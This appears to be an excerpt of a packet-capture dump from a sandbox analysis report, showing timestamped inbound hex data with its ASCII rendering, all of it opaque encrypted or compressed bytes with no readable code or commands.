                                                                                                                                                            2022-09-29 12:45:18 UTC27051INData Raw: ae 04 6a b4 15 37 01 ce 6a 75 22 ef 1e c7 0c d0 b1 d7 5a 7a dc d4 77 04 25 9f c3 50 46 54 c5 f0 98 5b 04 a5 6b d9 93 8b 49 27 21 6d ae 23 e3 73 4d 67 8d 88 47 e2 c8 f3 70 15 be 51 94 ba 49 05 0b 8e d6 61 c8 a1 50 a2 25 17 1b 81 dc 0d b8 d4 29 5e 8d 78 a7 6d a1 2c a6 7a 39 4f fd 1a de b5 56 01 78 ae f6 64 9e 25 38 08 0e 63 f1 61 81 dd f6 5e 1f 91 ea b2 be 89 c2 48 39 51 cd a4 60 b5 aa 2a e0 68 12 11 34 9e 42 40 42 c6 a0 1d 32 96 65 9e 4a 27 df 8c 43 b7 8c 77 f3 d8 4c d5 09 78 cc f6 ca 83 b3 8e 6c 55 96 66 92 8b 1a ff a7 2c e8 66 be e5 e5 c3 1c 4c ae 08 10 b5 cb a7 0e 6e a4 07 42 1a e3 63 9f 59 30 1b 9a f9 f7 65 2d eb db 31 bb bd fc 3b 37 cd 17 c5 e8 54 7b be a0 a8 e7 ed 4d 4e 15 46 8c b5 56 f3 1a bb ae 52 b2 97 e6 49 fc a4 40 b9 d4 d8 cf 1f 1a 52 36 0d 7c
                                                                                                                                                            Data Ascii: j7ju"Zzw%PFT[kI'!m#sMgGpQIaP%)^xm,z9OVxd%8ca^H9Q`*h4B@B2eJ'CwLxlUf,fLnBcY0e-1;7T{MNFVRI@R6|
                                                                                                                                                            2022-09-29 12:45:18 UTC27067INData Raw: be ba 1a f8 29 46 14 fa 19 15 d7 5d 24 b7 af ba bb 61 70 4d e4 0b 00 95 3c 72 1a 9a b0 9c 0b 2d 24 ee ea 46 36 c6 78 76 fb d0 65 03 e3 b4 c4 d7 f9 ce 3f 97 fc aa d8 d6 b3 52 3f 9c 26 9a 6e 14 ca d3 db c8 1a 92 d6 c7 a5 fc 91 83 f8 53 1b 84 76 0e 14 b3 b6 01 bc aa 24 05 ec 48 ca f2 41 2b 88 10 68 3c 3e 82 59 eb 01 75 29 4c ce d7 b5 8d 3f 8c 23 49 df ce 83 27 e9 4a 4c 35 c1 17 5e 75 2d c8 92 c0 95 0e 6f 0c 43 7c 9f 81 f3 53 31 e7 f6 d2 17 72 ac d6 98 90 2e ef 56 b1 88 2c 2f 3d 74 ec 77 5f fe 0f f7 a0 42 05 e4 e3 9e f3 de 84 9e fd 79 ca 90 e3 56 3f 33 0e 26 ac 7e f7 32 32 11 19 03 60 00 a6 d4 25 f1 97 84 18 1f b6 91 a9 2c da 6d 8f 9e 2b 43 df 9d ad b4 9b c0 e6 ff 32 6c b4 c7 f4 9a 08 37 af 48 d5 de 8f b6 96 1d fc a9 44 70 a5 11 0a 09 6e f9 b1 e4 e4 4f 85 be
                                                                                                                                                            Data Ascii: )F]$apM<r-$F6xve?R?&nSv$HA+h<>Yu)L?#I'JL5^u-oC|S1r.V,/=tw_ByV?3&~22`%,m+C2l7HDpnO
                                                                                                                                                            2022-09-29 12:45:18 UTC27083INData Raw: 5f 61 65 c5 98 24 76 bc 7d 22 fa b3 cd 0c 7b 95 fc 16 bc 10 1e 5d 09 e3 5a d5 62 7d c9 95 f5 89 81 b5 36 7f 17 0e f7 70 d3 b8 cf d7 b5 da 3d 14 9f d4 35 3a 40 4d 42 8c 9c 35 7f 77 73 ac 64 ec 51 22 7c a4 96 f3 b7 9e c8 45 df dc 6d 28 ca 86 87 64 31 56 c4 cf 52 7c a5 5f 54 06 a2 ee 2e c9 56 e5 2b 14 46 0c 70 b6 a0 1b cd 0a e2 76 6e 39 d0 db d7 20 da 4b 17 18 40 9f 0a 98 7d 12 b3 cb 78 13 b1 f8 fc be 9b ec 0d c1 c0 1f 20 47 c4 7b 75 04 f2 8e b2 a9 ff 0e 41 e6 45 b8 25 49 aa e2 f6 c8 73 82 29 c9 36 f5 0f da 2a 53 2a 41 35 a5 9f 20 00 f3 da 91 bf e3 f7 e9 f6 30 05 69 50 09 28 41 a9 ab e6 9c dc 44 64 91 bf d5 47 30 76 18 e2 e1 a1 4f 3d b3 18 c6 06 bb 00 71 77 34 79 b6 dd a4 c7 6e 3d 24 94 81 74 5f db a2 b4 ee db 70 e6 8d 79 1f 2c 0b 56 ff 51 3c a5 16 ae 15 a9
                                                                                                                                                            Data Ascii: _ae$v}"{]Zb}6p=5:@MB5wsdQ"|Em(d1VR|_T.V+Fpvn9 K@}x G{uAE%Is)6*S*A5 0iP(ADdG0vO=qw4yn=$t_py,VQ<
                                                                                                                                                            2022-09-29 12:45:18 UTC27099INData Raw: e9 57 7c 02 be 62 5e 37 da 34 fb 7c e5 07 f2 60 0c d1 47 8a 28 e1 97 6e b4 a4 a4 49 b8 47 df 54 a5 e4 f0 e4 1b ff b5 22 a1 5e 64 fe 87 a5 59 56 87 30 3d 4d 99 9c fd d4 82 a7 d3 46 43 57 b6 b1 84 b4 92 17 56 8a 19 f3 e1 e6 13 0c f9 fc 64 63 f5 c1 d4 ce d1 db 95 0f 29 e4 99 f7 d9 97 03 55 47 95 01 08 8e 9e 42 2f e1 cc 10 f7 fd bf 39 0a 13 44 b5 fb 82 43 e9 6a 23 e5 12 e9 21 ab 60 d0 fb 20 6b 95 04 e1 e6 72 35 01 4b 8a 15 c3 85 2a ce 18 45 42 b0 d5 db 15 0a b7 bd 77 bc b9 4e fa 6f 97 84 c3 e2 35 16 ad 04 66 bd ed 58 2b cb 08 b0 8c f2 dc 63 29 1f 0f c3 b1 b9 08 27 23 7c fa c2 69 d7 61 59 09 e2 c2 d8 9a 1e 71 6f bf 74 e8 e4 e9 af 76 46 c7 ee 9c e2 b6 b2 bf 21 61 cb b7 ee d0 6b 4b 4e 74 07 1f a7 3c c5 cd e0 e0 33 fe 61 80 83 1f 67 0c a9 f1 be 36 97 25 5d b6 07
                                                                                                                                                            Data Ascii: W|b^74|`G(nIGT"^dYV0=MFCWVdc)UGB/9DCj#!` kr5K*EBwNo5fX+c)'#|iaYqotvF!akKNt<3ag6%]
                                                                                                                                                            2022-09-29 12:45:18 UTC27115INData Raw: 89 9d 4f c0 73 b1 0e 26 4b 25 dc c2 66 e7 7f 09 42 bf 8d 32 d9 09 53 23 75 06 a2 cb 3e 51 51 4a f6 d1 73 86 67 88 da d3 83 11 20 a5 41 98 00 16 cc b1 a6 ca 20 99 62 24 74 6c a1 6d a6 26 f4 3b a6 67 01 92 ce c5 ca 39 62 27 d1 93 99 60 5b 59 a8 27 8e 74 9e dc 90 74 bc 54 b3 da 2e 93 14 90 48 d6 48 70 ec c8 a0 b0 c0 f9 26 ec 7f f3 4d 3b aa 41 db 04 7a 05 77 69 53 7c b0 01 54 06 84 7d ba 4a dd aa e9 7a 45 7f f6 a3 ab e2 50 9f e5 e1 b1 b8 6d 14 8b 2c 6c 33 8a c2 78 58 be 77 04 8e 98 dc c9 64 66 0e e3 1d 78 8b 83 84 bd df 5c 9b 1e ad 48 1f 1c 87 4c 9c 04 9c 54 8f 6f 64 e7 4d ca bf dc 03 99 05 af 9f c0 24 c1 76 74 39 f6 94 87 45 f9 f7 5d 32 e7 69 62 2d 78 dd 74 bc cc 34 20 30 1f 2b ec bb ad 57 fb e3 7c 06 35 fc 1d 61 bb d0 51 eb 32 16 02 b3 32 18 29 42 5d a8 27
                                                                                                                                                            Data Ascii: Os&K%fB2S#u>QQJsg A b$tlm&;g9b'`[Y'ttT.HHp&M;AzwiS|T}JzEPm,l3xXwdfx\HLTodM$vt9E]2ib-xt4 0+W|5aQ22)B]'
                                                                                                                                                            2022-09-29 12:45:18 UTC27131INData Raw: 8a 83 c9 af 30 44 29 70 6b b0 6b 91 a6 72 42 20 ab de f7 f6 3f 8f 1e f3 8f 95 bb b1 1a 1c e0 05 8e 6d c4 4a 8c 40 93 8f c2 b3 2c af ad ab 07 bd a5 33 86 bf 05 b2 41 cd e7 16 db 07 8f fb 89 b8 e4 27 1a a2 bc 08 7b 87 1d eb ff 59 12 8b 30 95 a1 b9 7c 6f 2d 15 65 52 77 9b 9e 6e 06 6f 26 e9 ae b2 b6 1b 19 9f 54 e6 b9 44 58 92 36 7c 00 6e ce df a7 0c 9a 24 2f fb 92 af 54 ff e1 10 c1 74 ed 13 7e 1b 24 ed bc d2 fa e2 99 9f 8f 13 06 85 8a 7b d8 19 97 92 da 0e 0d cd 60 0c 44 14 b8 28 29 9f cc 5f dc 22 f6 7a 24 21 dd a7 75 77 57 22 6a 1a 07 7e 5e 3c 5e 31 96 57 da 0d 1d 3e 09 05 e5 33 6b e0 d4 66 3e 29 87 a8 93 fb 91 d6 1f c4 0b 9d 7e 11 c7 29 66 ef 5f 5e 4a 14 e2 5b 1c fe fe 01 71 5c 78 86 9a fd 57 ec b8 c1 17 7b 3f 33 40 bc 08 0e 8d a0 67 3d 7d f5 62 e7 04 4c e1
                                                                                                                                                            Data Ascii: 0D)pkkrB ?mJ@,3A'{Y0|o-eRwno&TDX6|n$/Tt~${`D()_"z$!uwW"j~^<^1W>3kf>)~)f_^J[q\xW{?3@g=}bL
                                                                                                                                                            2022-09-29 12:45:18 UTC27147INData Raw: 69 2c 92 79 63 f1 87 83 f0 31 06 08 64 82 ff 98 bf 8e 46 b9 7b 5a fd cd 63 d7 69 92 23 a0 4b 30 46 81 46 23 b7 db 3d 06 2f 17 52 11 1d 69 a4 f8 00 1d 15 3c 0b d3 d6 64 9f fb 77 ac 81 22 41 ee 91 ba d8 2e 35 3f 98 34 a2 50 cb 82 83 c1 48 09 a9 6d 09 e0 f5 7b 94 bd 35 bf 97 d2 ff 85 2e 78 e4 d9 63 96 ca 3a 32 cc 0c 60 ee cf 19 2a ca f4 af 6c 5b 4a ef f4 f6 38 91 c4 c1 9e 59 d1 77 d4 76 97 e0 91 e5 58 ec cc c9 87 0b 63 5d b2 0d f2 c0 5a bb fe cf 34 00 c6 06 08 af cc c7 2f f2 ce 26 30 be 5c ce 1c d7 37 4d 6e 51 82 f2 f7 42 c1 ab c6 c7 34 fc 40 20 da 45 12 52 94 25 b1 95 05 69 f3 0a c6 cb 47 d2 33 9b 8c ea 24 0c dd 7f 00 b9 78 96 9d 9b 65 45 2b 48 c5 12 d8 d4 f0 71 48 3d 09 08 eb d4 9d 53 ea 3e 8f 07 8b 73 d5 fb 59 a3 2c 85 73 1d f0 e2 a4 c5 04 90 ba 9c 0f 97
                                                                                                                                                            Data Ascii: i,yc1dF{Zci#K0FF#=/Ri<dw"A.5?4PHm{5.xc:2`*l[J8YwvXc]Z4/&0\7MnQB4@ ER%iG3$xeE+HqH=S>sY,s
                                                                                                                                                            2022-09-29 12:45:18 UTC27163INData Raw: 37 de 42 02 f0 2c 32 59 bf 13 f5 41 8a ed cd 07 3f 9d 72 3d e6 20 20 c7 f5 b1 7e 99 5b 60 ee 2e b6 20 63 e1 ce fa d0 0f 19 e6 5d 64 b1 b3 1f 58 46 29 dc 87 cd 98 00 27 66 fc 35 aa 08 92 34 81 72 59 0b eb 12 d9 e8 38 69 70 df 74 2b c0 26 26 e6 12 7c 9e b0 21 73 8a dd c0 51 7d 36 c3 d7 ea 64 08 c3 e1 56 f0 ed 25 2f 6c ee 96 7c ad d5 44 af 4b 92 61 ab 68 cb a5 c1 1f ce 41 62 a3 27 6a 92 59 4d d7 92 84 61 80 0e 2b ac 63 56 5c 9c 3b ce 6a d8 11 30 ba d0 65 f3 72 5b 8c c2 02 92 35 17 86 d2 bc 2f 1f 82 0d 8f 2f a7 3c 14 ec bb a6 ec 75 30 20 12 8f 99 65 ba 2c 42 8c ef 0a d4 da 50 d5 7d 37 b2 70 d8 11 17 12 30 c1 6c ae cc 04 d7 3d 1d 6b 79 77 67 48 fb 41 90 2c aa 9c 27 71 05 00 ef 3c 68 26 db 3f 12 1f ab e0 87 b2 5c 8d cb 2a 1e e3 46 1f 4e 70 f6 5e 3c 19 26 f0 77
                                                                                                                                                            Data Ascii: 7B,2YA?r= ~[`. c]dXF)'f54rY8ipt+&&|!sQ}6dV%/l|DKahAb'jYMa+cV\;j0er[5//<u0 e,BP}7p0l=kywgHA,'q<h&?\*FNp^<&w
                                                                                                                                                            2022-09-29 12:45:18 UTC27179INData Raw: 7b 68 d8 25 d4 6b 4c e2 08 2e 75 35 36 e3 ec 87 9e 2b 78 cf ac fc 43 3d d4 8b 77 c1 d3 81 b3 5a dc 2c 34 84 95 a6 3f 88 33 ca 88 9f 6b 95 b4 43 23 3b 73 5e e9 00 0c 08 7b 94 f3 72 ef 80 7d 35 8b ab 8e 64 03 32 bf b9 54 58 f3 a4 93 e1 c6 7f 44 40 4e d9 1a 09 0e 5f 11 37 02 5b 79 d5 8d 83 a2 09 c8 18 89 aa c5 cf ef 90 79 90 c5 7e 20 9c f7 70 99 9a 53 9d 0b cb 36 fc b4 2a f1 b8 57 fd 53 0c e2 c4 c5 eb da 37 b5 64 82 d2 1b 95 ff 67 5f 6c 42 f7 34 06 87 23 a1 0c e0 ff 7b 8d 04 d6 53 0e 79 63 2b 77 95 d1 55 75 ac df ad be 91 47 b5 7f 7a 57 5f bf 16 80 33 c7 dd a8 74 8d aa d7 c4 9e b7 e3 59 c2 15 24 a0 7c 3c 03 10 ec e6 e5 f2 99 a2 1a 0d d0 bc 6c 01 b9 34 88 73 41 24 5e a4 c8 fc c2 ce cf e8 bd 7e 7b 63 42 ef 23 06 4f 73 86 5c 2f 07 00 a2 06 54 19 12 4b 4b 96 45
                                                                                                                                                            Data Ascii: {h%kL.u56+xC=wZ,4?3kC#;s^{r}5d2TXD@N_7[yy~ pS6*WS7dg_lB4#{Syc+wUuGzW_3tY$|<l4sA$^~{cB#Os\/TKKE
                                                                                                                                                            2022-09-29 12:45:18 UTC27195INData Raw: 0c 2a 6f 84 b8 25 ca cd fe 3c 55 e0 f5 54 bf 4b c7 34 66 fd 85 02 da fe 3b 2c b0 d5 54 30 8d 18 58 c3 68 e9 47 a9 51 f0 ed aa ea c1 6b 2b 66 30 83 83 6d 78 f3 48 18 a9 95 3d 10 00 a6 13 b4 f8 a7 62 c5 f9 b3 bc 1a da 25 67 e5 85 00 11 09 06 52 5c 61 22 94 6c 06 de 6b 55 ff 4d 50 55 69 ce 3d 8d 2c 3a 1f 58 9a 76 f7 7a 5d 55 f0 95 da 1b b9 da 63 87 58 20 38 99 b6 8d 5e 5d bc 4d 79 3c 36 4e 7e 98 e7 32 ad 8e b8 ed cb d0 d7 cd d7 b8 54 87 0b 95 a8 29 f0 e4 e8 7a 57 ae 5c 99 53 a7 3b 2e b3 c2 07 bb 42 eb 8f 81 0c d5 ef f4 0c ba 00 04 fc 30 35 55 f2 db f4 49 2c 31 d5 5c e1 80 4b 0a d0 2a e0 aa 92 36 18 70 08 e5 cb ee db b2 97 5c db 92 4b 2b 94 8b 7c 12 54 3b f2 07 0d 3f a8 47 e3 9d 55 f6 97 bc 70 b0 b9 f9 6d 7b 37 6c 22 35 8e 3f aa 4a 41 b9 7a fd bd 17 1b 3b c0
                                                                                                                                                            Data Ascii: *o%<UTK4f;,T0XhGQk+f0mxH=b%gR\a"lkUMPUi=,:Xvz]UcX 8^]My<6N~2T)zW\S;.B05UI,1\K*6p\K+|T;?GUpm{7l"5?JAz;
                                                                                                                                                            2022-09-29 12:45:18 UTC27211INData Raw: 3f 3a 47 6f 10 02 71 3e 68 ec a1 7a 4a f1 db c7 15 5c 38 7a eb ab 87 fc f7 29 f1 5d d6 5e 5c bb ff 84 82 a9 4f 32 af 89 01 03 aa d5 5d 2a 67 df db f3 67 7a 1c f6 10 d1 22 96 0a 31 07 83 5a 98 a8 0e 15 87 71 62 8e f0 ba 4e 8a f7 87 b8 14 d8 02 c6 e1 e1 3f 53 ff 36 d1 c2 87 6b 82 3e 08 02 e5 30 d5 c8 f7 38 ca 29 f3 97 32 37 4b a6 23 84 ee 23 77 0e c3 28 07 64 df 22 45 1e 4c a4 1b 7d 68 61 bf fd d2 f4 12 4e 44 44 45 d8 37 ab 22 b6 40 cd af b3 92 29 d5 5b 86 2f ba 0a 31 0e a7 3b 64 81 c6 0e dd d1 ac c5 4a 01 e1 dc 02 23 01 ba 04 9c 2d b4 c9 77 23 80 c3 fd fb 0d 96 d7 f1 69 a1 1e 39 cb 98 69 6b 42 ff e6 1e 87 f9 9d 7d fc 19 aa 8d 10 af 07 29 af d5 72 25 59 02 5b 89 46 5c e0 07 ae 43 bf 1b cd 63 c4 78 34 e0 bd 61 ad 87 ba d6 a0 a4 5f d5 e3 f7 0b 2b 3b c5 d7 13
                                                                                                                                                            Data Ascii: ?:Goq>hzJ\8z)]^\O2]*ggz"1ZqbN?S6k>08)27K##w(d"EL}haNDDE7"@)[/1;dJ#-w#i9ikB})r%Y[F\Ccx4a_+;
                                                                                                                                                            2022-09-29 12:45:18 UTC27227INData Raw: d1 ee bf f7 da c5 bf 17 b8 9d 6c 9a 2c b4 90 66 65 c7 14 41 85 06 4d 07 1c 88 37 8d 81 e9 c7 10 76 3b 1e ad 5a e5 84 0b fa a2 de 7b ff 6d 9d bc 83 6b 1e 52 28 f5 49 a0 c9 99 4a 88 23 e2 e4 3f c8 42 87 15 ca b8 78 73 53 cb 9d 9e dd cf fc 1d 41 46 18 85 ec 6a ef 3c 9c 05 37 04 9d f0 28 7b c8 46 b3 a7 cf 9a ee d1 81 8b 64 64 9b cd 33 5d 82 67 27 4b ea 36 e6 27 9c 09 51 2f 8e 0c 5d 9b 89 7e 5a bb 08 18 d2 81 85 4b e5 e0 bf b8 e3 d4 ff 38 09 71 55 dc f7 7d db 03 fa e5 aa 74 77 eb 2b 84 0f 0d 87 fb c2 ff f5 62 a6 43 6a 0a ac 57 f1 1b ab 0a f8 c9 ac 92 80 a8 d2 11 6c 0d 8d 7a 55 9b fa af 13 24 a2 b1 53 c3 af c4 f1 3a ae 32 50 37 9a 8d 1e 58 d4 0f 4f 00 0f 24 5a be c7 0e 2e 29 e8 dd 1e f3 2c 81 be 92 c2 fc 70 88 ae a8 73 c1 d7 16 be 03 81 6c b5 f5 1a 02 50 45 1a
                                                                                                                                                            Data Ascii: l,feAM7v;Z{mkR(IJ#?BxsSAFj<7({Fdd3]g'K6'Q/]~ZK8qU}tw+bCjWlzU$S:2P7XO$Z.),pslPE
                                                                                                                                                            2022-09-29 12:45:18 UTC27243INData Raw: ac 6b 7e ef 51 f8 82 9e 9f 55 b5 6a 47 30 f9 cf fd 3b 83 dd c4 bb 5a ab 3b 0e 78 a5 af 5a 4a ad ed 3a cc d0 bb fa 1b 87 26 76 fa f6 33 d0 26 53 89 0e 36 de 12 50 78 ad 04 6f 1a 03 4c 0a 21 d5 91 a1 d2 93 65 a1 e0 b7 ac a8 71 9b 10 50 c8 6a 8c d7 35 8f de 8f ff cb 5e 7c 94 a0 9e 7f 0e b2 5f f6 c8 34 9a 9a c3 ad d6 2d 24 ab c8 49 cb 08 fe 8c d1 aa b1 9c 10 35 99 94 03 d5 76 aa 9e 28 21 a6 20 48 34 db 50 f7 22 37 93 4c ee 89 0f fa 28 ee 81 77 c2 86 d6 1e 3d 7d 69 9d 09 3e 3a 87 2d 02 4c 2d 2d 40 5a 16 fb f3 7e 23 d9 56 8c de e0 9a e7 a5 9b c3 f1 06 29 26 d9 39 c5 17 b9 41 c5 19 75 f7 c8 a8 a6 ee 94 53 43 a3 d7 7e 0d 45 4c a0 ff 3c 02 a8 99 b3 94 f3 db 37 3a 6b 98 30 96 12 48 3c 77 fa e9 7c 21 20 7a 7c a0 72 4e ed 21 12 31 0f 29 df d0 d3 bd 01 0a 82 9e 04 e8
                                                                                                                                                            Data Ascii: k~QUjG0;Z;xZJ:&v3&S6PxoL!eqPj5^|_4-$I5v(! H4P"7L(w=}i>:-L--@Z~#V)&9AuSC~EL<7:k0H<w|! z|rN!1)
                                                                                                                                                            2022-09-29 12:45:18 UTC27259INData Raw: df b3 91 6b 50 d1 a5 f1 82 a1 d4 6e b9 ca ad 9a 73 05 05 a3 9c 60 24 35 1d a6 53 a8 6a 2d c3 6f f6 21 ea 25 42 2a 00 c1 b5 89 1c ea 52 40 2d dc da 15 11 61 60 76 16 40 03 ce 27 c2 57 35 77 64 c5 58 b9 0d c5 90 38 6c d5 4d 0a 80 74 09 28 91 23 63 7f ef 9c 6b 4c 21 dd 19 d6 4e 41 15 a2 46 6b 8c 23 09 f4 58 a1 ae ff 55 41 2e 85 0e 06 a4 b7 e5 9e 00 fe ce c1 10 f3 8e ac e3 71 44 4e de 2b fe 1b a4 15 0a 7c 3a 76 b6 18 5b 95 91 3c 1d 88 b0 f9 04 e5 33 0c b0 af ac 08 17 dc 5a 11 e0 ff 83 50 45 87 d5 fd 61 33 1b 02 99 b8 2d 74 c4 1f d6 67 19 52 bb 45 09 73 fd 67 14 4f c8 aa 41 85 e9 57 2b 45 6b 2a 6f bc 2c df fd e5 ce bf ce cc 27 43 58 ec 1a c7 c8 11 47 23 a2 cd 50 c1 60 7a e8 e7 72 c3 c3 13 90 cd 60 82 5d a9 a7 86 1c 37 08 b1 57 f0 1d 89 04 d1 0f e1 ee c5 d9 65
                                                                                                                                                            Data Ascii: kPns`$5Sj-o!%B*R@-a`v@'W5wdX8lMt(#ckL!NAFk#XUA.qDN+|:v[<3ZPEa3-tgREsgOAW+Ek*o,'CXG#P`zr`]7We
                                                                                                                                                            2022-09-29 12:45:18 UTC27275INData Raw: e6 08 09 86 65 31 4c a1 07 dd 09 28 18 e7 a9 07 94 09 51 67 ff e4 94 1d a2 ed e5 a8 bf b1 01 2b b2 e0 13 12 04 aa 87 33 d9 39 cd e3 0a df 0b 4c bc b2 d2 90 74 59 c5 0c 7d 23 81 02 4f d8 65 3b f8 eb 87 c1 a0 25 13 9d 6f 0b 4a 0f e6 9a 82 b0 66 c1 58 7c e6 84 72 f7 7f c8 c9 4e 15 b3 bd 44 bd a0 7a 50 d6 a7 37 2a 2f 9e 85 ae 3a 86 18 43 f7 45 52 3f 2d de f6 ea 55 3e d0 00 87 5f 08 c4 0c 0f 77 4c 01 63 0e 9e d3 15 91 af fa 8e f8 fa 09 74 6e f3 7a f5 de 90 8e ee 6d d1 9e 12 ac 99 57 3f 5c 96 ec 13 91 d8 f8 6d 3a 85 17 c3 83 47 12 c9 ae 1a 37 f2 d4 43 07 b4 a3 11 c5 6b d1 3c 29 d5 1c cc 6c 93 a4 d6 3d b0 ac 6d f6 72 d8 c7 db 05 87 c2 a0 6f 55 2b ac 0e a4 e1 69 64 86 ed 5c 7d cc d0 25 d7 1c e8 40 9e 09 c3 f1 48 f6 7d ca 92 4d 9a 2e bb 3d 04 40 30 d0 df 5c e2 d0
                                                                                                                                                            Data Ascii: e1L(Qg+39LtY}#Oe;%oJfX|rNDzP7*/:CER?-U>_wLctnzmW?\m:G7Ck<)l=mroU+id\}%@H}M.=@0\
                                                                                                                                                            2022-09-29 12:45:18 UTC27291INData Raw: b6 1b d3 f8 16 81 e6 4d 0d c0 15 99 2a 95 85 c6 78 58 cd ad aa 34 60 c7 f5 e8 13 85 c8 cd 90 68 11 32 26 7d 54 a1 5d c4 2b 3f fb 2d f1 03 a6 ca 89 fa a0 61 62 fd e2 9b 63 6d 31 f0 de e3 5c 7e c0 c3 40 c9 7b 21 17 1f 78 3f f3 d0 7b c7 a1 77 7c 63 c0 5b ae 93 84 76 d2 36 b0 30 05 11 ad a1 0d 6c 33 93 95 7a 52 73 75 9f 7c 9c 2c 23 11 21 0f 9c b5 b3 36 3f c8 9b 38 88 0c 59 20 a2 71 c1 9c 82 03 bc 4a 69 0a a3 ff fb 55 ce d7 30 aa 60 3a 56 6e c4 da f6 49 2a e0 c5 4e d8 39 47 a3 29 22 0a ce c4 3a 61 78 7b e7 e2 0d cd b4 df 1c 57 ab b2 1d 71 49 ca dd 5a d0 ae f4 dc bd 9f 24 ba 61 f5 c6 98 88 e2 27 9e b1 ff ac 89 31 1c cb 82 4f e1 76 21 62 9a 3a 28 aa 8e ed ef 90 25 43 09 67 bd 4f 54 66 f6 83 34 8d 42 52 5a ae 9c ee e4 3a 60 e9 58 81 ab b5 0a 2d b2 64 81 82 fc 61
                                                                                                                                                            Data Ascii: M*xX4`h2&}T]+?-abcm1\~@{!x?{w|c[v60l3zRsu|,#!6?8Y qJiU0`:VnI*N9G)":ax{WqIZ$a'1Ov!b:(%CgOTf4BRZ:`X-da
                                                                                                                                                            2022-09-29 12:45:18 UTC27307INData Raw: 7c aa 18 81 68 a0 5a 27 d6 c3 f4 6c 9a 4c 7b 43 ca 34 0a 9a 22 d2 fe d5 bc 89 8c 63 2b 13 5e ff aa 4c 7b ed 0b 7a 6d 95 13 7b e1 dd 60 b5 2f 68 c6 95 fa c1 b4 cd f7 89 63 9a 98 0d 62 56 0c c6 a5 91 9c 91 0d 84 1c 30 fe 98 38 f5 05 30 0d e6 2a 8e 1b da c9 5d 19 d3 c8 c4 7f 95 b6 ea 99 4f a1 10 bc 9b f2 63 a3 0a 73 d1 af 7a 58 f7 8e 79 b9 0a ea d3 12 46 a9 14 2b 48 9e 6f 0c 92 72 9f 06 63 08 f1 3d de 23 c8 98 f8 c7 b1 13 85 08 b2 95 5b 42 ed c3 4d 0c 8d e1 0d 69 4b c1 ac 32 bd ae a5 19 98 0f 49 48 14 d0 a1 f1 b9 73 ae 83 f7 e8 8a 1b a8 01 17 57 a7 b1 80 12 dd 1c 70 f8 25 78 ef 83 f4 3e ab 38 6e af 6e 48 58 ee bf ee 38 fb 92 90 cb 65 ea 1b 3a a6 ea 17 b1 d4 61 9c ad 3f 32 d7 4c 0c a9 c8 a4 9a 24 89 93 43 af 95 6b 15 57 64 ed a1 5f 64 1f 0f 9b 16 e9 0c 43 a5
                                                                                                                                                            Data Ascii: |hZ'lL{C4"c+^L{zm{`/hcbV080*]OcszXyF+Horc=#[BMiK2IHsWp%x>8nnHX8e:a?2L$CkWd_dC
                                                                                                                                                            2022-09-29 12:45:18 UTC27323INData Raw: 56 82 f7 88 48 b7 50 ad e0 a4 78 7a 7f ba 6d ea b7 5c b5 fc d9 d5 44 c7 ee fc 39 07 f8 7c f8 b4 86 84 66 2e d2 7c d5 a8 37 d1 90 7c 9f 82 e5 ba ff 90 e4 32 56 c8 bc 84 be 31 38 5e c8 e7 6d 35 c8 7d 34 73 60 c4 d2 d3 95 eb 75 84 35 42 5e 68 a7 5d 0b 62 f6 b2 ae 33 0a df c5 c9 55 63 90 da bc 8e ba e6 4d 89 ed f2 c1 2b f7 1d c3 6b c7 cf 82 90 db b1 0d b7 ec d3 ea 1d ce 30 ed c2 7e 09 7b f6 81 2e 92 d5 c8 e7 c3 e4 01 67 7e de ca a9 a5 48 a8 38 21 8b 7e cd e8 46 f7 73 c9 14 b2 e9 1f 55 11 16 38 ff 7d 3d 1e 47 8f be 9b bb d3 d0 78 a6 e9 fc 9b e6 c4 e3 2c b2 63 ba b8 63 ca a0 56 08 eb 59 0d fb ad 5c 01 de fe 12 32 28 6d 9f 3d b1 0e 3d 35 bd 8d 37 7a 48 a3 3d f0 79 35 b0 47 b0 8b 53 df 43 f9 da 53 a0 eb 61 9b f7 6d 30 2b 64 d3 36 9b 89 2a 94 20 d7 bc f8 8f bc 44
                                                                                                                                                            Data Ascii: VHPxzm\D9|f.|7|2V18^m5}4s`u5B^h]b3UcM+k0~{.g~H8!~FsU8}=Gx,ccVY\2(m==57zH=y5GSCSam0+d6* D
                                                                                                                                                            2022-09-29 12:45:18 UTC27339INData Raw: e5 7f 73 f8 e3 1a 27 e7 1c b5 21 90 3c 0c 7b 02 52 83 b6 0f 5d b6 fa 19 24 cf e8 5c 69 46 0b ed 39 8d a1 a4 dc 00 af 37 ac bb c2 bc 4a 7d 9e e6 57 8d 20 01 da 46 e0 83 f2 af d5 bd 0b 00 a8 1a 0e 79 60 65 f4 a4 0c 77 2b c0 1b 29 b9 b1 f8 14 50 5f 3d 81 76 35 78 a7 28 39 07 66 dd b9 24 9a b7 5e c3 67 99 91 91 8c e6 2b 79 6b ab 53 a7 ad ad c6 40 28 09 08 03 ab 14 7d 85 02 93 6c f1 74 84 16 38 2f b5 3c b3 7a a8 06 6b 96 fe a1 03 3f 15 a8 34 04 23 f4 ee 93 59 23 1d 6d 11 46 83 b0 b5 5b 2e 75 34 1a 79 94 82 a5 67 37 f5 3a 00 42 0c 2e 8e 31 55 40 08 8a 4a 02 8d 99 ca 87 4a 10 98 89 c4 c1 97 21 78 c4 a0 cf da 99 71 ab 28 25 64 fc 14 50 c5 85 d7 22 83 a8 d0 9b c9 0c 2c 4b a7 06 ed b7 16 48 b1 df 2d 0e d6 3a d4 f5 7f 5a 11 29 14 12 d5 20 5a 9a b2 dc 19 5b 76 2b 88
                                                                                                                                                            Data Ascii: s'!<{R]$\iF97J}W Fy`ew+)P_=v5x(9f$^g+ykS@(}lt8/<zk?4#Y#mF[.u4yg7:B.1U@JJ!xq(%dP",KH-:Z) Z[v+
